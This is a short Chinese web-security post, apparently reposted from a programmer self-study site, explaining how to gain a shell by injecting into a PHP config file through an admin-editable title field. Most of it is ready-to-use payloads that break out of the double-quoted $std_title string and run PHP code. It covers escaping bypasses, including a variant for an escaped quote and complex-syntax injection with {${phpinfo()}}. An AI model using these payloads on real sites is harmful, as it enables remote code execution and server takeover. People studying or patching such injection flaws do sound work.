一网站config.php原本为:
<?php //设定title $std_title = "123" ?> 这个123是可以在后台控制的。于是我去闭合他。将123变成123"?><?php phpinfo();die();?>//
如果不转义的情况下,上面是ok的
如果只转义了"变成 \"
可以使用123\"?><?php phpinfo();die();?>//
如果使用\"被转义成\\\"
可以尝试
{${phpinfo()}}
则
$std_title="{${phpinfo()}}"
查看更多关于php后台闭合配置文件双引号GETSHELL - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14541